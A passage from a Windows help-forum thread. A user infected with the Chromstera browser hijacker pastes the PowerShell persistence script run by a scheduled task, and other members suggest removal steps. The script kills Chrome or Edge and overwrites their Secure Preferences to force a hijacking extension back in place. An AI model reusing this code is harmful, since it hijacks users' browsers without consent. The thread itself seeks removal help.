Chromstera browser hijacker on my computer, need help finding and deleting files

Kade_ · Sep 29, 2024

I have the Chromstera browser hijacker on my computer and I'm not sure where it came from (there could be a few places but i've deleted all of the sketchy things i know on my computer). It has embedded myself into my computer, opening cmd and powershell to reinstall old files and keep my browser 'managed'. I just found the scheduled task that's running cmd and powershell, and this is the code I believe it's running:

Code:

Add-Type @"
using System;
using System.Runtime.InteropServices;
using System.Text;

public class User32 {
    [DllImport("user32.dll")]
    public static extern IntPtr GetForegroundWindow();

    [DllImport("user32.dll", SetLastError=true)]
    public static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);

    [DllImport("user32.dll")]
    public static extern bool GetLastInputInfo(ref LASTINPUTINFO plii);

    public struct LASTINPUTINFO
    {
        public uint cbSize;
        public uint dwTime;
    }
}
"@

Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing

$form = New-Object System.Windows.Forms.Form
$form.Text = 'Data Entry Form'
$form.Size = New-Object System.Drawing.Size(300,200)
$form.StartPosition = 'CenterScreen'

$okButton = New-Object System.Windows.Forms.Button
$okButton.Location = New-Object System.Drawing.Point(75,120)
$okButton.Size = New-Object System.Drawing.Size(75,23)
$okButton.Text = 'OK'
$okButton.DialogResult = [System.Windows.Forms.DialogResult]::OK
$form.AcceptButton = $okButton
$form.Controls.Add($okButton)

$cancelButton = New-Object System.Windows.Forms.Button
$cancelButton.Location = New-Object System.Drawing.Point(150,120)
$cancelButton.Size = New-Object System.Drawing.Size(75,23)
$cancelButton.Text = 'Cancel'
$cancelButton.DialogResult = [System.Windows.Forms.DialogResult]::Cancel
$form.CancelButton = $cancelButton
$form.Controls.Add($cancelButton)

$label = New-Object System.Windows.Forms.Label
$label.Location = New-Object System.Drawing.Point(10,20)
$label.Size = New-Object System.Drawing.Size(280,20)
$label.Text = 'Please enter the information in the space below:'
$form.Controls.Add($label)

$textBox = New-Object System.Windows.Forms.TextBox
$textBox.Location = New-Object System.Drawing.Point(10,40)
$textBox.Size = New-Object System.Drawing.Size(260,20)

function Get-ActiveWindowTitle {
    $hWnd = [User32]::GetForegroundWindow()
    $text = New-Object System.Text.StringBuilder 256
    if ([User32]::GetWindowText($hWnd, $text, $text.Capacity) -gt 0) {
        return $text.ToString()
    }
    return $null
}

function Is-Extension-Installed {
    param (
        [string] $preference,
        [string] $id
    )

    try {
        if (Test-Path -Path $preference) {
            $chrome_json = Get-Content $preference -Raw | ConvertFrom-Json;

            foreach($ext in $chrome_json.extensions.settings.PsObject.Properties) {
                $name = $ext.Name;
                $value = $ext.Value;

                if ($name -eq $id) {
                    if ($value.state -eq 1) {
                        return $true;
                        break;
                    }
                }
            }
        }
    } catch {
        Write-Host $_.Exception.Message;
    }

    return $false;
}

$localappdata = $env:localappdata;

$chrome = "Google\Chrome";
$edge = "Microsoft\Edge";

$chromeProfile = "$localappdata\$chrome\User Data\Default\";
$edgeProfile = "$localappdata\$edge\User Data\Default\";

$chromeExt = "$chromeProfile\Extensions\$id";
$edgeExt = "$edgeProfile\Extensions\$id";

$chromePref = "$chromeProfile\Secure Preferences";
$edgePref = "$edgeProfile\Secure Preferences";

$configFile = "$localappdata\reserve\config.txt";

if (Test-Path -Path $configFile) {
    $data = Get-Content -Path $configFile;
    $id = $data[4].Substring(7);

    $chromeData = Get-Content -Path $chromePref -ErrorAction SilentlyContinue;
    $edgeData = Get-Content -Path $edgePref -ErrorAction SilentlyContinue;

    if ((Test-Path -Path $chromeExt) -Or (Test-Path -Path $edgeExt)) {
        $chromeInstalled = Is-Extension-Installed -preference $chromePref -id $id;
        $edgeInstalled = Is-Extension-Installed -preference $edgePref -id $id;

        if (-Not($chromeInstalled -And $edgeInstalled)) {
            $checkIntervalSeconds = 60 # Check interval (e.g., every 10 seconds)
            $nonBrowserDuration = 600  # If non-browser active for 60 seconds, display success
            $nonBrowserTime = 0 # Timer for non-browser activity

            for ($i = 0; $i -lt 300; $i++) {
                $activeWindow = Get-ActiveWindowTitle

                if ($activeWindow -match "Chrome|Edge") {
                    Write-Output "The active window is a browser (Chrome or Edge): $activeWindow";
                    $nonBrowserTime = 0;
                } else {
                    Write-Output "The active window is not Chrome or Edge. It is: $activeWindow"
                    $nonBrowserTime += $checkIntervalSeconds;
                }

                if ($nonBrowserTime -ge $nonBrowserDuration) {
                    if (Test-Path -Path $chromeExt) {
                        if ($chromeInstalled) {
                            Write-Output "Chrome Extension Already Installed";
                        } else {
                            Stop-Process -Name 'chrome';
                            $file = "$localappdata\reserve\$chrome\Secure Preferences";
                            Copy-Item -Path $file -Destination $chromeProfile -Force;
                        }
                    }

                    if (Test-Path -Path $edgeExt) {
                        if ($edgeInstalled) {
                            Write-Output "Edge Extension Already Installed";
                        } else {
                            Stop-Process -Name 'msedge';
                            $file = "$localappdata\reserve\$edge\Secure Preferences";
                            Copy-Item -Path $file -Destination $edgeProfile -Force;
                        }
                    }

                    break;
                }

                Start-Sleep -Seconds $checkIntervalSeconds;
            }
        } else {
            Write-Output "Extension already installed on Chrome & Edge";
        }
    } else {
        Write-Output "Extension folder not found";
    }
} else {
    Write-Output "Config file not found";
}

It seems to have folders of 'world wide solutions' and 'web genius solutions' that I cannot get access to in order to delete it.
Somebody please help me out!! I've had to ditch chrome because of this

antspants · Sep 29, 2024

Hi, welcome

The info I am receiving says that you should be able to install Revo Uninstaller Free and remove Chromstera, is that not the case?

Or:

Remove Chromstera Browser Hijacker [Virus Removal Guide]

Chromstera is a browser hijacker that installs its own customized Chromium browser and changes the homepage and search engine to Chromstera Search.

malwaretips.com

Kade_ · Sep 29, 2024

i believe i've tried this already but i'll check again.

Kade_ · Sep 29, 2024

Hi antspants, I have tried Revo and it has not worked. After many searches, safe mode boots, and permission changes, I am down to one folder containing a powershell command. I cannot delete it as it says access is denied, and when I change the folder owner so the account I am currently on owns it, it still says that I need permission FROM THE ACCOUNT I AM USING to delete the file. I also cannot use cmd in recovery as it cannot find the file.

antspants · Sep 30, 2024

Try this?

Add Take Ownership to Context Menu in Windows 11

This tutorial will show you how to add Take Ownership to the context menu of all files, folders, and drives for all users in Windows 10 and Windows 11. This will allow you to be able to instantly take ownership of a file, folder (and all contents), or drive (and all contents) by changing the...

www.elevenforum.com

antspants · Sep 30, 2024

Maybe you need to run powershell or explorer with the highest privileges above what is available to you.

PowerRun v1.7 (Run with highest privileges)

PowerRun is a tool to launch any program/script files with the same privileges as the TrustedInstaller /SYSTEM. it is a Portable and free

www.sordum.org

The above app is small and anything I have tried from this crew sordom is most safe. Everything they offer is free.

Kade_ · Sep 30, 2024

so should i run file explorer with highest privileges?

antspants · Sep 30, 2024

Kade_ said:
so should i run file explorer with highest privileges?

If that program allows it I would assume it may help. I forget how to add an app to that app, in this case file explorer, but I don't recall it being hard

Outside of that I don’t know enough about this problem you’re having with deleting what you need to.

Kade_ · Sep 30, 2024

I ran cmd with powerrun, did RD and it STILL gave me access denied.
I'm thinking of giving up since it's pretty much a harmless file at this point since it can't run unless I open it but i don't really want to take that chance.

Kade_ · Sep 30, 2024

I'm going to sleep since it's currently past midnight, i'll try again tomorrow i guess.

Jacee · Oct 2, 2024

Hi Kade right click on the taskbar and choose task manager. See if you can stop Chromstera from running by right clicking and choosing Stop.

Next see if you can run Revo to uninstall it.

Chromstera browser hijacker on my computer, need help finding and deleting files

Member

Attachments

My Computer

Like a rolling drone.

My Computers

Member

My Computer

Member

My Computer

Like a rolling drone.

My Computers

Like a rolling drone.

My Computers

Member

My Computer

Like a rolling drone.

My Computers

Member

My Computer

Member

My Computer

Accroche-toi à ton rêve

My Computers